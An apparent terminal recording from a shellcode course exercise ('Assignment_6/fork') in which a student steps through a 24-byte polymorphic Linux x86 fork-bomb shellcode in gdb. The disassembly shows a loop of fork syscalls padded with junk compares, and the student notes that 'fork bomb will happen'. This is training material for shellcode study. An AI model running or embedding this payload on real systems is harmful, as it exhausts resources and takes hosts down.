[38.034566, "o", "\u001b[C"]
[38.034873, "o", "4202504"]
[38.035038, "o", "\r\n"]
[38.035235, "o", "ebx            0x401fd4"]
[38.035415, "o", "\u001b[C"]
[38.035565, "o", "4202452"]
[38.035716, "o", "\r\n"]
[38.035902, "o", "ecx            0x0"]
[38.036077, "o", "\u001b[6C"]
[38.036228, "o", "0"]
[38.036381, "o", "\r\n"]
[38.03661, "o", "edx            0xb7fb7890"]
[38.036788, "o", "\u001b[7C"]
[38.036934, "o", "-1208256368"]
[38.037099, "o", "\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1H"]
[38.037288, "o", "Dump of assembler code from 0x402008 to 0x402012:"]
[38.037437, "o", "\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1H"]
[38.037621, "o", "=> 0x00402008 <code+0>:"]
[38.037765, "o", "\u001b[C"]
[38.038037, "o", "cmp    ebx,0x3d"]
[38.038206, "o", "\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1H"]
[38.038388, "o", "   0x0040200b <code+3>:"]
[38.038681, "o", "\u001b[C"]
[38.038841, "o", "nop"]
[38.038999, "o", "\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1H"]
[38.039173, "o", "   0x0040200c <code+4>:"]
[38.039613, "o", "\u001b[Cxor    eax,eax\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1H   0x0040200e <code+6>:\u001b[Ccmp    ebx,0x3d\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1H   0x00402011 <code+9>:\u001b[Ccmp    eax,0xfffffffa\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1HEnd of assembler dump.\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1H\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1H"]
[38.040415, "o", "Breakpoint 1, 0x00402008 in code ()"]
[38.040583, "o", "\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1H"]
[38.040784, "o", "(gdb) "]
[39.34489, "o", "d"]
[39.455532, "o", "i"]
[39.567446, "o", "s"]
[39.712606, "o", "a"]
[39.903796, "o", "s"]
[40.083096, "o", "\u001b[?25l\u001b[H[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mgdb shellcode\u001b[K\r\nReading symbols from shellcode...(no debugging symbols found)...done.\u001b[K\r\n(gdb) break *&code\u001b[K\r\nBreakpoint 1 at 0x2008\u001b[K\r\n(gdb) run\u001b[K\r\nStarting program: /media/sf_SLAE_Course/SLAE/Assignment_6/fork/shellcode\u001b[K\r\nShellcode Length:  24\u001b[K\r\neax            0x402008 4202504\u001b[K\r\nebx            0x401fd4 "]
[40.083393, "o", "4202452\u001b[K\r\necx            0x0      0\u001b[K\r\nedx            0xb7fb7890       -1208256368\u001b[K\r\nDump of assembler code from 0x402008 to 0x402012:\u001b[K\r\n=> 0x00402008 <code+0>: cmp    ebx,0x3d\u001b[K\r\n   0x0040200b <code+3>: nop\u001b[K\r\n   0x0040200c <code+4>: xor    eax,eax\u001b[K\r\n   0x0040200e <code+6>: cmp    ebx,0x3d\u001b[K\r\n   0x00402011 <code+9>: cmp    eax,0xfffffffa\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n\u001b[K\r\nBreakpoint 1, 0x00402008 in code ()\u001b[K\r\n(gdb) disas\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:13 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[23;12H\u001b[?12l\u001b[?25h"]
[40.095879, "o", "s"]
[40.159613, "o", "\u001b[?25l\u001b[H[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mgdb shellcode\u001b[K\r\nReading symbols from shellcode...(no debugging symbols found)...done.\u001b[K\r\n(gdb) break *&code\u001b[K\r\nBreakpoint 1 at 0x2008\u001b[K\r\n(gdb) run\u001b[K\r\nStarting program: /media/sf_SLAE_Course/SLAE/Assignment_6/fork/shellcode\u001b[K\r\nShellcode Length:  24\u001b[K\r\neax            0x402008 4202504\u001b[K\r\nebx            0x401fd4 "]
[40.15989, "o", "4202452\u001b[K\r\necx            0x0      0\u001b[K\r\nedx            0xb7fb7890       -1208256368\u001b[K\r\nDump of assembler code from 0x402008 to 0x402012:\u001b[K\r\n=> 0x00402008 <code+0>: cmp    ebx,0x3d\u001b[K\r\n   0x0040200b <code+3>: nop\u001b[K\r\n   0x0040200c <code+4>: xor    eax,eax\u001b[K\r\n   0x0040200e <code+6>: cmp    ebx,0x3d\u001b[K\r\n   0x00402011 <code+9>: cmp    eax,0xfffffffa\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n\u001b[K\r\nBreakpoint 1, 0x00402008 in code ()\u001b[K\r\n(gdb) disass\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:13 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[23;13H\u001b[?12l\u001b[?25h"]
[40.353195, "o", "e"]
[40.599609, "o", "mble "]
[41.768575, "o", "$"]
[42.040902, "o", "e"]
[42.152714, "o", "i"]
[42.343459, "o", "p"]
[42.640712, "o", ","]
[43.793408, "o", "+"]
[44.207422, "o", "\b\u001b[K"]
[44.384123, "o", "\b\u001b[K"]
[44.615638, "o", "+"]
[45.233113, "o", "2"]
[45.343813, "o", "0"]
[45.872635, "o", "\u001b[1;23r\u001b[15S\u001b[9;1HDump of assembler code for function code:\r\n=> 0x00402008 <+0>:\u001b[5Ccmp    ebx,0x3d\r\n   0x0040200b <+3>:\u001b[5Cnop\r\n   0x0040200c <+4>:\u001b[5Cxor    eax,eax\r\n   0x0040200e <+6>:\u001b[5Ccmp    ebx,0x3d\r\n   0x00402011 <+9>:\u001b[5Ccmp    eax,0xfffffffa\r\n   0x00402014 <+12>:\u001b[4Ccmp    ecx,0xffffffab\r\n   0x00402017 <+15>:\u001b[4Cxchg   ebx,ebx\r\n   0x00402019 <+17>:\u001b[4Cnop\r\n   0x0040201a <+18>:\u001b[4Cmov    al,0x2\r\n   0x0040201c <+20>:\u001b[4Cint    0x80\r\n   0x0040201e <+22>:\u001b[4Cjmp    0x402008 <code>\r\n   0x00402020 <+24>:\u001b[4Cadd    BYTE PTR [eax],al\r\nEnd of assembler dump.\r\n(gdb) \u001b[1;24r\u001b[23;7H"]
[50.166995, "o", "\u001b[?25l\u001b[H   0x0040200b <code+3>: nop\u001b[K\r\n   0x0040200c <code+4>: xor    eax,eax\u001b[K\r\n   0x0040200e <code+6>: cmp    ebx,0x3d\u001b[K\r\n   0x00402011 <code+9>: cmp    eax,0xfffffffa\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n\u001b[K\r\nBreakpoint 1, 0x00402008 in code ()\u001b[K\r\n(gdb) disassemble $eip+20\u001b[K\r\nDump of assembler code for function code:\u001b[K\r\n=> 0x00402008 <+0>:     cmp    ebx,0x3d\u001b[K\r\n   0x0040200b <+3>:     nop\u001b[K\r\n   0x0040200c <+4>:     xor    eax,eax\u001b[K\r\n   0x0040200e <+6>:     cmp    ebx,"]
[50.167468, "o", "0x3d\u001b[K\r\n   0x00402011 <+9>:     cmp    eax,0xfffffffa\u001b[K\r\n   0x00402014 <+12>:    cmp    ecx,0xffffffab\u001b[K\r\n   0x00402017 <+15>:    xchg   ebx,ebx\u001b[K\r\n   0x00402019 <+17>:    nop\u001b[K\r\n   0x0040201a <+18>:    mov    al,0x2\u001b[K\r\n   0x0040201c <+20>:    int    0x80\u001b[K\r\n   0x0040201e <+22>:    jmp    0x402008 <code>\u001b[K\r\n   0x00402020 <+24>:    add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n(gdb)\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:13 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[23;7H\u001b[?12l\u001b[?25h"]
[50.266686, "o", "\u001b[?25l\u001b[H   0x0040200b <code+3>: nop\u001b[K\r\n   0x0040200c <code+4>: xor    eax,eax\u001b[K\r\n   0x0040200e <code+6>: cmp    ebx,0x3d\u001b[K\r\n   0x00402011 <code+9>: cmp    eax,0xfffffffa\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n\u001b[K\r\nBreakpoint 1, 0x00402008 in code ()\u001b[K\r\n(gdb) disassemble $eip+20\u001b[K\r\nDump of assembler code for function code:\u001b[K\r\n=> 0x00402008 <+0>:     cmp    ebx,0x3d\u001b[K\r\n   0x0040200b <+3>:     nop\u001b[K\r\n   0x0040200c <+4>:     xor    eax,eax\u001b[K\r\n   0x0040200e <+6>:     cmp    ebx,"]
[50.266953, "o", "0x3d\u001b[K\r\n   0x00402011 <+9>:     cmp    eax,0xfffffffa\u001b[K\r\n   0x00402014 <+12>:    cmp    ecx,0xffffffab\u001b[K\r\n   0x00402017 <+15>:    xchg   ebx,ebx\u001b[K\r\n   0x00402019 <+17>:    nop\u001b[K\r\n   0x0040201a <+18>:    mov    al,0x2\u001b[K\r\n   0x0040201c <+20>:    int    0x80\u001b[K\r\n   0x0040201e <+22>:    jmp    0x402008 <code>\u001b[K\r\n   0x00402020 <+24>:    add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n(gdb)\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:13 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[23;7H\u001b[?12l\u001b[?25h"]
[55.656745, "o", "s"]
[55.807431, "o", "i"]
[56.144346, "o", "\u001b[1;23r\u001b[13S\u001b[11;1Heax            0x402008\u001b[C4202504\r\nebx            0x401fd4\u001b[C4202452\r\necx            0x0\u001b[6C0\r\nedx            0xb7fb7890\u001b[7C-1208256368\r\nDump of assembler code from 0x40200b to 0x402015:\r\n=> 0x0040200b <code+3>:\u001b[Cnop\r\n   0x0040200c <code+4>:\u001b[Cxor    eax,eax\r\n   0x0040200e <code+6>:\u001b[Ccmp    ebx,0x3d\r\n   0x00402011 <code+9>:\u001b[Ccmp    eax,0xfffffffa\r\n   0x00402014 <code+12>:\u001b[8Ccmp    ecx,0xffffffab\r\nEnd of assembler dump.\r\n0x0040200b in code ()\r\n(gdb) \u001b[1;24r\u001b[23;7H"]
[56.68147, "o", "\u001b[1;23r\u001b[12S\u001b[12;1Heax            0x402008\u001b[C4202504\r\nebx            0x401fd4\u001b[C4202452\r\necx            0x0\u001b[6C0\r\nedx            0xb7fb7890\u001b[7C-1208256368\r\nDump of assembler code from 0x40200c to 0x402016:\r\n=> 0x0040200c <code+4>:\u001b[Cxor    eax,eax\r\n   0x0040200e <code+6>:\u001b[Ccmp    ebx,0x3d\r\n   0x00402011 <code+9>:\u001b[Ccmp    eax,0xfffffffa\r\n   0x00402014 <code+12>:\u001b[8Ccmp    ecx,0xffffffab\r\nEnd of assembler dump.\r\n0x0040200c in code ()\r\n(gdb) \u001b[1;24r\u001b[23;7H"]
[57.281188, "o", "\u001b[1;23r\u001b[12S\u001b[12;1Heax            0x0\u001b[6C0\r\nebx            0x401fd4\u001b[C4202452\r\necx            0x0\u001b[6C0\r\nedx            0xb7fb7890\u001b[7C-1208256368\r\nDump of assembler code from 0x40200e to 0x402018:\r\n=> 0x0040200e <code+6>:\u001b[Ccmp    ebx,0x3d\r\n   0x00402011 <code+9>:\u001b[Ccmp    eax,0xfffffffa\r\n   0x00402014 <code+12>:\u001b[8Ccmp    ecx,0xffffffab\r\n   0x00402017 <code+15>:\u001b[8Cxchg   ebx,ebx\r\nEnd of assembler dump.\r\n0x0040200e in code ()\r\n(gdb) \u001b[1;24r\u001b[23;7H"]
[57.840147, "o", "\u001b[1;23r\u001b[13S\u001b[11;1Heax            0x0\u001b[6C0\r\nebx            0x401fd4\u001b[C4202452\r\necx            0x0\u001b[6C0\r\nedx            0xb7fb7890\u001b[7C-1208256368\r\nDump of assembler code from 0x402011 to 0x40201b:\r\n=> 0x00402011 <code+9>:\u001b[Ccmp    eax,0xfffffffa\r\n   0x00402014 <code+12>:\u001b[8Ccmp    ecx,0xffffffab\r\n   0x00402017 <code+15>:\u001b[8Cxchg   ebx,ebx\r\n   0x00402019 <code+17>:\u001b[8Cnop\r\n   0x0040201a <code+18>:\u001b[8Cmov    al,0x2\r\nEnd of assembler dump.\r\n0x00402011 in code ()\r\n(gdb) \u001b[1;24r\u001b[23;7H"]
[58.361506, "o", "\u001b[1;23r\u001b[13S\u001b[11;1Heax            0x0\u001b[6C0\r\nebx            0x401fd4\u001b[C4202452\r\necx            0x0\u001b[6C0\r\nedx            0xb7fb7890\u001b[7C-1208256368\r\nDump of assembler code from 0x402014 to 0x40201e:\r\n=> 0x00402014 <code+12>:\u001b[8Ccmp    ecx,0xffffffab\r\n   0x00402017 <code+15>:\u001b[8Cxchg   ebx,ebx\r\n   0x00402019 <code+17>:\u001b[8Cnop\r\n   0x0040201a <code+18>:\u001b[8Cmov    al,0x2\r\n   0x0040201c <code+20>:\u001b[8Cint    0x80\r\nEnd of assembler dump.\r\n0x00402014 in code ()\r\n(gdb) \u001b[1;24r\u001b[23;7H"]
[58.89624, "o", "\u001b[1;23r\u001b[14S\u001b[10;1Heax            0x0\u001b[6C0\r\nebx            0x401fd4\u001b[C4202452\r\necx            0x0\u001b[6C0\r\nedx            0xb7fb7890\u001b[7C-1208256368\r\nDump of assembler code from 0x402017 to 0x402021:\r\n=> 0x00402017 <code+15>:\u001b[8Cxchg   ebx,ebx\r\n   0x00402019 <code+17>:\u001b[8Cnop\r\n   0x0040201a <code+18>:\u001b[8Cmov    al,0x2\r\n   0x0040201c <code+20>:\u001b[8Cint    0x80\r\n   0x0040201e <code+22>:\u001b[8Cjmp    0x402008 <code>\r\n   0x00402020 <code+24>:\u001b[8Cadd    BYTE PTR [eax],al\r\nEnd of assembler dump.\r\n0x00402017 in code ()\r\n(gdb) \u001b[1;24r\u001b[23;7H"]
[59.810674, "o", "\u001b[1;23r\u001b[11S\u001b[13;1Heax            0x0\u001b[6C0\r\nebx            0x401fd4\u001b[C4202452\r\necx            0x0\u001b[6C0\r\nedx            0xb7fb7890\u001b[7C-1208256368\r\nDump of assembler code from 0x402019 to 0x402023:\r\n=> 0x00402019 <code+17>:\u001b[8Cnop\r\n   0x0040201a <code+18>:\u001b[8Cmov    al,0x2\r\n   0x0040201c <code+20>:\u001b[8Cint    0x80\r\n   0x0040201e <code+22>:\u001b[8Cjmp    0x402008 <code>\r\n   0x00402020 <code+24>:\u001b[8Cadd    BYTE PTR [eax],al\u001b[1;24r\u001b[23;1H"]
[59.811296, "o", "\u001b[1;23r\u001b[3S\u001b[20;1H   0x00402022:\u001b[2Cadd    BYTE PTR [eax],al\r\nEnd of assembler dump.\r\n0x00402019 in code ()\r\n(gdb) \u001b[1;24r\u001b[23;7H"]
[60.081483, "o", "\u001b[?25l\u001b[H=> 0x00402017 <code+15>:        xchg   ebx,ebx\u001b[K\r\n   0x00402019 <code+17>:        nop\u001b[K\r\n   0x0040201a <code+18>:        mov    al,0x2\u001b[K\r\n   0x0040201c <code+20>:        int    0x80\u001b[K\r\n   0x0040201e <code+22>:        jmp    0x402008 <code>\u001b[K\r\n   0x00402020 <code+24>:        add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402017 in code ()\u001b[K\r\n(gdb)\u001b[K\r\neax            0x0      0\u001b[K\r\nebx            0x401fd4 4202452\u001b[K\r\necx            0x0      0\u001b[K\r\nedx"]
[60.081768, "o", "            0xb7fb7890       -1208256368\u001b[K\r\nDump of assembler code from 0x402019 to 0x402023:\u001b[K\r\n=> 0x00402019 <code+17>:        nop\u001b[K\r\n   0x0040201a <code+18>:        mov    al,0x2\u001b[K\r\n   0x0040201c <code+20>:        int    0x80\u001b[K\r\n   0x0040201e <code+22>:        jmp    0x402008 <code>\u001b[K\r\n   0x00402020 <code+24>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402022:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402019 in code ()\u001b[K\r\n(gdb)\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:13 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[23;7H\u001b[?12l\u001b[?25h"]
[60.138394, "o", "\u001b[?25l\u001b[H=> 0x00402017 <code+15>:        xchg   ebx,ebx\u001b[K\r\n   0x00402019 <code+17>:        nop\u001b[K\r\n   0x0040201a <code+18>:        mov    al,0x2\u001b[K\r\n   0x0040201c <code+20>:        int    0x80\u001b[K\r\n   0x0040201e <code+22>:        jmp    0x402008 <code>\u001b[K\r\n   0x00402020 <code+24>:        add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402017 in code ()\u001b[K\r\n(gdb)\u001b[K\r\neax            0x0      0\u001b[K\r\nebx            0x401fd4 4202452\u001b[K\r\necx            0x0      0\u001b[K\r\nedx"]
[60.142345, "o", "            0xb7fb7890       -1208256368\u001b[K\r\nDump of assembler code from 0x402019 to 0x402023:\u001b[K\r\n=> 0x00402019 <code+17>:        nop\u001b[K\r\n   0x0040201a <code+18>:        mov    al,0x2\u001b[K\r\n   0x0040201c <code+20>:        int    0x80\u001b[K\r\n   0x0040201e <code+22>:        jmp    0x402008 <code>\u001b[K\r\n   0x00402020 <code+24>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402022:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402019 in code ()\u001b[K\r\n(gdb)\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:13 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[23;7H\u001b[?12l\u001b[?25h"]
[60.424406, "o", "\u001b[1;23r\u001b[13S\u001b[11;1Heax            0x0\u001b[6C0\r\nebx            0x401fd4\u001b[C4202452\r\necx            0x0\u001b[6C0\r\nedx            0xb7fb7890\u001b[7C-1208256368\r\nDump of assembler code from 0x40201a to 0x402024:\r\n=> 0x0040201a <code+18>:\u001b[8Cmov    al,0x2\r\n   0x0040201c <code+20>:\u001b[8Cint    0x80\r\n   0x0040201e <code+22>:\u001b[8Cjmp    0x402008 <code>\r\n   0x00402020 <code+24>:\u001b[8Cadd    BYTE PTR [eax],al\r\n   0x00402022:\u001b[2Cadd    BYTE PTR [eax],al\r\nEnd of assembler dump.\r\n0x0040201a in code ()\r\n(gdb) \u001b[1;24r\u001b[23;7H"]
[61.024706, "o", "\u001b[1;23r\u001b[13S\u001b[11;1Heax            0x2\u001b[6C2\r\nebx            0x401fd4\u001b[C4202452\r\necx            0x0\u001b[6C0\r\nedx            0xb7fb7890\u001b[7C-1208256368\r\nDump of assembler code from 0x40201c to 0x402026:\r\n=> 0x0040201c <code+20>:\u001b[8Cint    0x80\r\n   0x0040201e <code+22>:\u001b[8Cjmp    0x402008 <code>\r\n   0x00402020 <code+24>:\u001b[8Cadd    BYTE PTR [eax],al\r\n   0x00402022:\u001b[2Cadd    BYTE PTR [eax],al\r\n   0x00402024:\u001b[2Cadd    BYTE PTR [eax],al\r\nEnd of assembler dump.\r\n0x0040201c in code ()\r\n(gdb) \u001b[1;24r\u001b[23;7H"]
[66.684623, "o", "n"]
[66.867147, "o", "o"]
[67.539886, "o", "w"]
[67.651952, "o", " "]
[67.843327, "o", "f"]
[67.94723, "o", "o"]
[68.060344, "o", "r"]
[68.267078, "o", "m"]
[68.363532, "o", " "]
[68.7472, "o", "\b\u001b[K"]
[68.932533, "o", "\b\u001b[K"]
[69.212456, "o", " "]
[69.579988, "o", "\b\u001b[K"]
[69.812301, "o", "k"]
[69.876389, "o", " "]
[70.077919, "o", "\u001b[?25l\u001b[Hedx            0xb7fb7890       -1208256368\u001b[K\r\nDump of assembler code from 0x40201a to 0x402024:\u001b[K\r\n=> 0x0040201a <code+18>:        mov    al,0x2\u001b[K\r\n   0x0040201c <code+20>:        int    0x80\u001b[K\r\n   0x0040201e <code+22>:        jmp    0x402008 <code>\u001b[K\r\n   0x00402020 <code+24>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402022:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x0040201a in code ()\u001b[K\r\n(gdb)\u001b[K\r\neax            0x2      2\u001b[K\r\nebx          "]
[70.078343, "o", "  0x401fd4 4202452\u001b[K\r\necx            0x0      0\u001b[K\r\nedx            0xb7fb7890       -1208256368\u001b[K\r\nDump of assembler code from 0x40201c to 0x402026:\u001b[K\r\n=> 0x0040201c <code+20>:        int    0x80\u001b[K\r\n   0x0040201e <code+22>:        jmp    0x402008 <code>\u001b[K\r\n   0x00402020 <code+24>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402022:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402024:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x0040201c in code ()\u001b[K\r\n(gdb) now fork\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:13 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[23;16H\u001b[?12l\u001b[?25h"]
[70.147465, "o", "\u001b[?25l\u001b[Hedx            0xb7fb7890       -1208256368\u001b[K\r\nDump of assembler code from 0x40201a to 0x402024:\u001b[K\r\n=> 0x0040201a <code+18>:        mov    al,0x2\u001b[K\r\n   0x0040201c <code+20>:        int    0x80\u001b[K\r\n   0x0040201e <code+22>:        jmp    0x402008 <code>\u001b[K\r\n   0x00402020 <code+24>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402022:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x0040201a in code ()\u001b[K\r\n(gdb)\u001b[K\r\neax            0x2      2\u001b[K\r\nebx          "]
[70.148513, "o", "  0x401fd4 4202452\u001b[K\r\necx            0x0      0\u001b[K\r\nedx            0xb7fb7890       -1208256368\u001b[K\r\nDump of assembler code from 0x40201c to 0x402026:\u001b[K\r\n=> 0x0040201c <code+20>:        int    0x80\u001b[K\r\n   0x0040201e <code+22>:        jmp    0x402008 <code>\u001b[K\r\n   0x00402020 <code+24>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402022:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402024:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x0040201c in code ()\u001b[K\r\n(gdb) now fork\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:13 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[23;16H\u001b[?12l\u001b[?25h"]
[70.211208, "o", "b"]
[70.292289, "o", "o"]
[70.500013, "o", "m"]
[70.635021, "o", "b"]
[71.275605, "o", " "]
[71.507037, "o", "w"]
[71.58763, "o", "i"]
[71.787207, "o", "l"]
[71.947235, "o", "l"]
[71.99512, "o", " "]
[72.17996, "o", "h"]
[72.29182, "o", "a"]
[72.427125, "o", "p"]
[72.587051, "o", "p"]
[72.739189, "o", "e"]
[72.82054, "o", "n"]
[73.083266, "o", " "]
[73.212527, "o", ":"]
[73.507121, "o", ")"]
[74.763612, "o", "\u001b[1;23r\u001b[23;80H\n\u001b[22;35HQuit\r\n(gdb) \u001b[1;24r\u001b[23;7H"]
[76.467986, "o", "u"]
[76.763403, "o", "\b\u001b[K"]
